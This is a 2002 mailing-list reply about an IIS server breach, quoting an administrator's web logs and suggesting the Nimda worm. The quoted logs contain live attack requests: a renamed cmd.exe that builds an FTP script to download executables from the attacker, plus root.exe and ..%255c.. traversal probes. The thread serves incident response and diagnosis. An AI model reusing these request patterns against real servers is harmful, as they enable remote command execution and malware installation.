Re: IIS Server Log security breach?

Sun, 03 Mar 2002 17:48:38 -0800 

NIMDA Worm?

http://www.incidents.org/react/nimda.pdf

Should be the attacking system's IP, but probably not the originiator of the attack.

On Tue, 26 Feb 2002 15:51:44 -0500
"GP" <[EMAIL PROTECTED]> wrote:

> Help,   I recently found this on my IIS server after being contacted
> that my webserver attempted to scan someone's machine on port 80.  I've
> looked on my web box and found the following files were installed
> msxc32.exe which seems to be Mirc program which is some type of chat
> program.  I've talked to other techs here who have not installed this
> program.  I've traced the following ip addresses back to the domain
> admins but before I contact I need to know if this is the intruder's ip
> address and what would be the best course of action. On the flip side
> what do I need to do to prevent this from happening in the future?  I
> have since blocked these addresses but this is only a temp fix.
> 
> 18:56:21 156.63.205.48 GET
> /iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr
> 502
> 18:56:23 156.63.205.2 GET
> /iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502
> 18:56:25 156.63.205.48 GET
> /iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502
> 18:56:27 156.63.205.2 GET
> /iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502
> 18:56:33 156.63.205.48 GET
> /iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502
> 18:56:35 156.63.205.2 GET
> /iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502
> 18:56:37 156.63.205.48 GET
> /iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502
> 18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
> 18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
> 20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET
> 
> 


Mark Robinson
<[EMAIL PROTECTED]>

Reply via email to